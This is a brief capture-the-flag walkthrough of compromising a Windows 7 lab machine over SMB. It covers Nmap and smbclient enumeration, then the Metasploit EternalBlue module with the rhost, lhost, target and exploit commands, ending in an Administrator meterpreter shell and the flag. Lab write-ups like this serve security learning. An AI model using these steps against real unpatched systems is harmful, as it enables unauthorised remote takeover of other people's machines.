Started with an Nmap scan
The output of the Nmap scan shows us that the machine is using SMB, and because I used the option -A in the Nmap command, I was able to see that the SMB version running was 2.1, and the Operating System version was Windows 7.
We can attempt to list out the available SMB shares without authentication by using the smbclient tool.
We can try to connect to 'Users' and 'Share' shares but I know from experience that the SMB version 2.1 is vulnerable to the EternalBlue exploit.
(If you didn't know this that's fine, a simple google search for 'SMB 2.1 exploit' would lead you to this).
I chose to do perform this exploit using Metasploit, https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/
The above link tells us to use the exploit :
The we can set the following options:
set rhost 10..10.10.40
set lhost tun0
We enumerated earlier from the Nmap scan that the OS version was Windows 7.
Entering 'show targets' we can can see the option for this is 1
set target 1
Now we can ensure these options were correctly applied using the options command.
After this we can enter exploit or run.
We get a meterpreter shell, and with a getuid we can see we are Administrator (so no need for any privilege escalation).
Now we cd into the Desktop of the machine and use the type command to output the flag.
Congratulations you have completed this box!!
Comments